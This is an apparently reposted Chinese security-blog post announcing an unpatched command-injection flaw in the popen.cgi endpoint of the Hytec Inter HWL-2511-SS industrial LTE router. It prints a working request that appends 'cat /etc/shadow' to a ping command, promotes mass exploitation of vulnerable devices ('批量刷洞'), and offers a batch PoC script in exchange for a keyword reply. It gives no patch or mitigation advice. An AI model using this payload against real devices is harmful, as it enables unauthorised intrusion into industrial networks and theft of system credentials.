【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】

admin 2023年8月17日15:04:50评论245 views字数 500阅读1分40秒阅读模式

免责声明

【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】
【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】

本公众号所提供的文字和信息仅供学习和研究使用,请读者自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任


【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】

漏洞简述

【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】


Hytec Inter HWL-2511-SS是日本Hytec Inter公司的一种工业 LTE 路由器和 Wi-Fi 接入点。Hw 期间爆出0day 其 popen.cgi命令注入漏洞

                                          

【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】

漏洞影响

【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】


<= 当前最新版本


漏洞复现

【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】

【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】

/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137921

发送payload,响应如下则存在漏洞。

【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】

使用Poc脚本批量刷洞

【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】

获取 POC

【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】


回复关键字【20230816】获取POC



End


“点赞、在看与分享都是莫大的支持”


                                                


原文始发于微信公众号(贝雷帽SEC):【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月17日15:04:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【HW-0day】Hytec Inter HWL-2511-SS RCE【POC】http://cn-sec.com/archives/1961451.html

发表评论

匿名网友 填写信息